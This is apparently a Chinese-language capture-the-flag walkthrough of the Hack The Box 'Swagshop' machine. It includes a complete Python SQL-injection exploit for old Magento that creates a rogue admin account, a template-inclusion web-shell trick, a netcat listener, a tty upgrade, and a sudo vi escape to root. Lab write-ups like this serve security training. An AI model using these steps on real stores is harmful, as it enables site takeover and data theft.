Swagshop

Posted by admin on 2020年2月23日

Swagshop

nmap扫描端口

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.140 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.10.10.140

访问80端口为2014 Magento

Google：magento 2014 exploit

import requests
import base64
import sys

target = "http://10.10.10.140/index.php"

if not target.startswith("http"):
    target = "http://" + target

if target.endswith("/"):
    target = target[:-1]

target_url = target + "/admin/Cms_Wysiwyg/directive/index/"

q="""
SET @SALT = 'rp';
SET @PASS = CONCAT(MD5(CONCAT( @SALT , '{password}') ), CONCAT(':', @SALT ));
SELECT @EXTRA := MAX(extra) FROM admin_user WHERE extra IS NOT NULL;
INSERT INTO admin_user (firstname, lastname,email,username,password,created,lognum,reload_acl_flag,is_active,extra,rp_token,rp_token_created_at) VALUES ('Firstname','Lastname','email@example.com','{username}',@PASS,NOW(),0,0,1,@EXTRA,NULL, NOW());
INSERT INTO admin_role (parent_id,tree_level,sort_order,role_type,user_id,role_name) VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username = '{username}'),'Firstname');
"""

query = q.replace("\n", "").format(username="forme", password="forme")
pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(query)

# e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ decoded is{{block type=Adminhtml/report_search_grid output=getCsvFile}}
r = requests.post(target_url, 
                  data={"___directive": "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ",
                        "filter": base64.b64encode(pfilter),
                        "forwarded": 1})
if r.ok:
    print "WORKED"
    print "Check {0}/admin with creds forme:forme".format(target)
else:
    print "DID NOT WORK"

执行脚本

使用forme:forme登陆

系统->配置

高级->开发人员

模板设置–>允许符号链接->保存配置

gedit shell.php.png

目录–>管理类别：

文件上传至：http://10.10.10.140/media/catalog/category/shell.php.png

新闻稿–>新闻稿模板：

输入：

{{block type='core/template' template='../../../../../../media/catalog/category/shell.php.png'}}

kali监听：

nc -vlp 1337

保存并预览

get www shell

python3 获取tty shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl+z
stty raw -echo

get user.txt

sudo -l

sudo /usr/bin/vi /var/www/html/index.php
:!/bin/bash

get root shell

get root.txt